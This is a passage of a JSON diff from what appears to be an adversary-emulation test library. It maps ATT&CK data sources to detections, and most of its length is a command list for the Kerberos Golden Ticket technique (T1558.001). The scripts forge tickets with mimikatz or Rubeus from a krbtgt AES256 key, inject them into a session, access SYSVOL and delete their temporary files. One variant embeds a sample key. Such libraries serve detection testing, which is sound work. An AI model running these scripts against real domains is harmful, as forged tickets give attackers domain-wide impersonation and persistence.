"collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service creation", + "description": "A service/daemon was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "service" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + 
"source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + } + ], + "external_reference": [ + null, + [ + "https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications", + "https://www.linux.com/news/introduction-services-runlevels-and-rcd-scripts/" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ] + ] + }, + { + "technique_id": "T1558.001", + "command_list": [ + "Remove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n\n# get current domain SID if 
default was used\n$domain_sid = \"S-1-5-21-DEFAULT\"\nIf ($domain_sid -Match \"DEFAULT\") {\n # code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60\n $domain = gwmi Win32_ComputerSystem | Select -Expand Domain\n $krbtgtSID = (New-Object Security.Principal.NTAccount $domain\\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value\n $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-'))\n}\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to golden.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\golden.txt 2>&1 (\n echo Purge existing tickets and create golden ticket:\n klist purge\n #{mimikatz_path} \"kerberos::golden /domain:#{domain} /sid:DOMAIN_SID /aes256:#{krbtgt_aes256_key} /user:#{account} /ptt\" \"exit\"\n\n echo.\n echo Requesting SYSVOL:\n dir \\\\#{domain}\\SYSVOL\n \n echo.\n echo Tickets after requesting SYSVOL:\n klist\n\n echo.\n echo End of Golden Ticket attack\n)\n\"@ -Replace \"DOMAIN_SID\", $domain_sid | Out-File -Encoding OEM $env:TEMP\\golden.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\golden.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\golden.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Golden Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\golden.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n", + "Remove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt 
-ErrorAction Ignore\n\n# get current domain SID if default was used\n$domain_sid = \"#{domain_sid}\"\nIf ($domain_sid -Match \"DEFAULT\") {\n # code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60\n $domain = gwmi Win32_ComputerSystem | Select -Expand Domain\n $krbtgtSID = (New-Object Security.Principal.NTAccount $domain\\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value\n $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-'))\n}\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to golden.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\golden.txt 2>&1 (\n echo Purge existing tickets and create golden ticket:\n klist purge\n #{mimikatz_path} \"kerberos::golden /domain:%userdnsdomain% /sid:DOMAIN_SID /aes256:#{krbtgt_aes256_key} /user:#{account} /ptt\" \"exit\"\n\n echo.\n echo Requesting SYSVOL:\n dir \\\\%userdnsdomain%\\SYSVOL\n \n echo.\n echo Tickets after requesting SYSVOL:\n klist\n\n echo.\n echo End of Golden Ticket attack\n)\n\"@ -Replace \"DOMAIN_SID\", $domain_sid | Out-File -Encoding OEM $env:TEMP\\golden.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\golden.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\golden.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Golden Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\golden.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n", + "Remove-Item $env:TEMP\\golden.bat 
-ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n\n# get current domain SID if default was used\n$domain_sid = \"#{domain_sid}\"\nIf ($domain_sid -Match \"DEFAULT\") {\n # code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60\n $domain = gwmi Win32_ComputerSystem | Select -Expand Domain\n $krbtgtSID = (New-Object Security.Principal.NTAccount $domain\\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value\n $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-'))\n}\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to golden.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\golden.txt 2>&1 (\n echo Purge existing tickets and create golden ticket:\n klist purge\n #{mimikatz_path} \"kerberos::golden /domain:#{domain} /sid:DOMAIN_SID /aes256:#{krbtgt_aes256_key} /user:goldenticketfakeuser /ptt\" \"exit\"\n\n echo.\n echo Requesting SYSVOL:\n dir \\\\#{domain}\\SYSVOL\n \n echo.\n echo Tickets after requesting SYSVOL:\n klist\n\n echo.\n echo End of Golden Ticket attack\n)\n\"@ -Replace \"DOMAIN_SID\", $domain_sid | Out-File -Encoding OEM $env:TEMP\\golden.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\golden.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\golden.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Golden Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\golden.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction 
Ignore\n", + "Remove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n\n# get current domain SID if default was used\n$domain_sid = \"#{domain_sid}\"\nIf ($domain_sid -Match \"DEFAULT\") {\n # code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60\n $domain = gwmi Win32_ComputerSystem | Select -Expand Domain\n $krbtgtSID = (New-Object Security.Principal.NTAccount $domain\\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value\n $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-'))\n}\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to golden.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\golden.txt 2>&1 (\n echo Purge existing tickets and create golden ticket:\n klist purge\n #{mimikatz_path} \"kerberos::golden /domain:#{domain} /sid:DOMAIN_SID /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9 /user:#{account} /ptt\" \"exit\"\n\n echo.\n echo Requesting SYSVOL:\n dir \\\\#{domain}\\SYSVOL\n \n echo.\n echo Tickets after requesting SYSVOL:\n klist\n\n echo.\n echo End of Golden Ticket attack\n)\n\"@ -Replace \"DOMAIN_SID\", $domain_sid | Out-File -Encoding OEM $env:TEMP\\golden.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\golden.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\golden.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Golden Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\golden.txt\n\n# cleanup temp files\nRemove-Item 
$env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n", + "Remove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n\n# get current domain SID if default was used\n$domain_sid = \"#{domain_sid}\"\nIf ($domain_sid -Match \"DEFAULT\") {\n # code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60\n $domain = gwmi Win32_ComputerSystem | Select -Expand Domain\n $krbtgtSID = (New-Object Security.Principal.NTAccount $domain\\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value\n $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-'))\n}\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to golden.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\golden.txt 2>&1 (\n echo Purge existing tickets and create golden ticket:\n klist purge\n $env:TEMP\\mimikatz\\x64\\mimikatz.exe \"kerberos::golden /domain:#{domain} /sid:DOMAIN_SID /aes256:#{krbtgt_aes256_key} /user:#{account} /ptt\" \"exit\"\n\n echo.\n echo Requesting SYSVOL:\n dir \\\\#{domain}\\SYSVOL\n \n echo.\n echo Tickets after requesting SYSVOL:\n klist\n\n echo.\n echo End of Golden Ticket attack\n)\n\"@ -Replace \"DOMAIN_SID\", $domain_sid | Out-File -Encoding OEM $env:TEMP\\golden.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\golden.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\golden.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Golden Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content 
$env:TEMP\\golden.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n", + "Remove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n\ncmd.exe /c \"#{local_folder}\\#{local_executable}\" golden /aes256:#{krbtgt_aes256_key} /ldap /user:#{account} /dc:$($ENV:logonserver.TrimStart('\\') + \".\" + \"$ENV:userdnsdomain\") /printcmd /outfile:golden\n$filename = (Get-ChildItem | ? {$_.Name.startswith(\"golden_\")} | Sort-Object -Descending -Property LastWriteTime | select -First 1).Name\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to golden.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\golden.txt 2>&1 (\n echo Purge existing tickets and create golden ticket:\n klist purge\n cd %temp%\n \"#{local_folder}\\#{local_executable}\" ptt /ticket:kirbifile\n\n echo.\n echo Requesting SYSVOL:\n dir \\\\$($ENV:logonserver.TrimStart('\\') + \".\" + \"$ENV:userdnsdomain\")\\SYSVOL\n \n echo.\n echo Tickets after requesting SYSVOL:\n klist\n\n echo.\n echo End of Golden Ticket attack\n)\n\"@ -Replace \"kirbifile\", $filename | Out-File -Encoding OEM $env:TEMP\\golden.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\golden.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\golden.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Golden Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\golden.txt\n\n# cleanup temp files\nRemove-Item 
$env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n", + "Remove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n\ncmd.exe /c \"#{local_folder}\\#{local_executable}\" golden /aes256:#{krbtgt_aes256_key} /ldap /user:$ENV:username /dc:$(#{domaincontroller}) /printcmd /outfile:golden\n$filename = (Get-ChildItem | ? {$_.Name.startswith(\"golden_\")} | Sort-Object -Descending -Property LastWriteTime | select -First 1).Name\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to golden.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\golden.txt 2>&1 (\n echo Purge existing tickets and create golden ticket:\n klist purge\n cd %temp%\n \"#{local_folder}\\#{local_executable}\" ptt /ticket:kirbifile\n\n echo.\n echo Requesting SYSVOL:\n dir \\\\$(#{domaincontroller})\\SYSVOL\n \n echo.\n echo Tickets after requesting SYSVOL:\n klist\n\n echo.\n echo End of Golden Ticket attack\n)\n\"@ -Replace \"kirbifile\", $filename | Out-File -Encoding OEM $env:TEMP\\golden.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\golden.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\golden.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Golden Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\golden.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n", + "Remove-Item $env:TEMP\\golden.bat -ErrorAction 
Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n\ncmd.exe /c \"#{local_folder}\\#{local_executable}\" golden /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9 /ldap /user:#{account} /dc:$(#{domaincontroller}) /printcmd /outfile:golden\n$filename = (Get-ChildItem | ? {$_.Name.startswith(\"golden_\")} | Sort-Object -Descending -Property LastWriteTime | select -First 1).Name\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to golden.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\golden.txt 2>&1 (\n echo Purge existing tickets and create golden ticket:\n klist purge\n cd %temp%\n \"#{local_folder}\\#{local_executable}\" ptt /ticket:kirbifile\n\n echo.\n echo Requesting SYSVOL:\n dir \\\\$(#{domaincontroller})\\SYSVOL\n \n echo.\n echo Tickets after requesting SYSVOL:\n klist\n\n echo.\n echo End of Golden Ticket attack\n)\n\"@ -Replace \"kirbifile\", $filename | Out-File -Encoding OEM $env:TEMP\\golden.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\golden.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\golden.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Golden Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\golden.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n", + "Remove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n\ncmd.exe /c \"$Env:temp\\#{local_executable}\" golden 
/aes256:#{krbtgt_aes256_key} /ldap /user:#{account} /dc:$(#{domaincontroller}) /printcmd /outfile:golden\n$filename = (Get-ChildItem | ? {$_.Name.startswith(\"golden_\")} | Sort-Object -Descending -Property LastWriteTime | select -First 1).Name\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to golden.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\golden.txt 2>&1 (\n echo Purge existing tickets and create golden ticket:\n klist purge\n cd %temp%\n \"$Env:temp\\#{local_executable}\" ptt /ticket:kirbifile\n\n echo.\n echo Requesting SYSVOL:\n dir \\\\$(#{domaincontroller})\\SYSVOL\n \n echo.\n echo Tickets after requesting SYSVOL:\n klist\n\n echo.\n echo End of Golden Ticket attack\n)\n\"@ -Replace \"kirbifile\", $filename | Out-File -Encoding OEM $env:TEMP\\golden.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\golden.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\golden.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Golden Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\golden.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n", + "Remove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n\ncmd.exe /c \"#{local_folder}\\rubeus.exe\" golden /aes256:#{krbtgt_aes256_key} /ldap /user:#{account} /dc:$(#{domaincontroller}) /printcmd /outfile:golden\n$filename = (Get-ChildItem | ? 
{$_.Name.startswith(\"golden_\")} | Sort-Object -Descending -Property LastWriteTime | select -First 1).Name\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to golden.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\golden.txt 2>&1 (\n echo Purge existing tickets and create golden ticket:\n klist purge\n cd %temp%\n \"#{local_folder}\\rubeus.exe\" ptt /ticket:kirbifile\n\n echo.\n echo Requesting SYSVOL:\n dir \\\\$(#{domaincontroller})\\SYSVOL\n \n echo.\n echo Tickets after requesting SYSVOL:\n klist\n\n echo.\n echo End of Golden Ticket attack\n)\n\"@ -Replace \"kirbifile\", $filename | Out-File -Encoding OEM $env:TEMP\\golden.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\golden.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\golden.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Golden Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\golden.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n", + "Remove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n\ncmd.exe /c \"#{local_folder}\\#{local_executable}\" golden /aes256:#{krbtgt_aes256_key} /ldap /user:#{account} /dc:$(#{domaincontroller}) /printcmd /outfile:golden\n$filename = (Get-ChildItem | ? 
{$_.Name.startswith(\"golden_\")} | Sort-Object -Descending -Property LastWriteTime | select -First 1).Name\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to golden.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\golden.txt 2>&1 (\n echo Purge existing tickets and create golden ticket:\n klist purge\n cd %temp%\n \"#{local_folder}\\#{local_executable}\" ptt /ticket:kirbifile\n\n echo.\n echo Requesting SYSVOL:\n dir \\\\$(#{domaincontroller})\\SYSVOL\n \n echo.\n echo Tickets after requesting SYSVOL:\n klist\n\n echo.\n echo End of Golden Ticket attack\n)\n\"@ -Replace \"kirbifile\", $filename | Out-File -Encoding OEM $env:TEMP\\golden.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\golden.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\golden.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Golden Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\golden.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n" + ], + "commands": [ + { + "command": "Remove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n\n# get current domain SID if default was used\n$domain_sid = \"S-1-5-21-DEFAULT\"\nIf ($domain_sid -Match \"DEFAULT\") {\n # code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60\n $domain = gwmi Win32_ComputerSystem | Select -Expand Domain\n $krbtgtSID = (New-Object Security.Principal.NTAccount 
$domain\\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value\n $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-'))\n}\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to golden.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\golden.txt 2>&1 (\n echo Purge existing tickets and create golden ticket:\n klist purge\n #{mimikatz_path} \"kerberos::golden /domain:#{domain} /sid:DOMAIN_SID /aes256:#{krbtgt_aes256_key} /user:#{account} /ptt\" \"exit\"\n\n echo.\n echo Requesting SYSVOL:\n dir \\\\#{domain}\\SYSVOL\n \n echo.\n echo Tickets after requesting SYSVOL:\n klist\n\n echo.\n echo End of Golden Ticket attack\n)\n\"@ -Replace \"DOMAIN_SID\", $domain_sid | Out-File -Encoding OEM $env:TEMP\\golden.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\golden.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\golden.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Golden Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\golden.txt\n\n# cleanup temp files\nRemove-Item 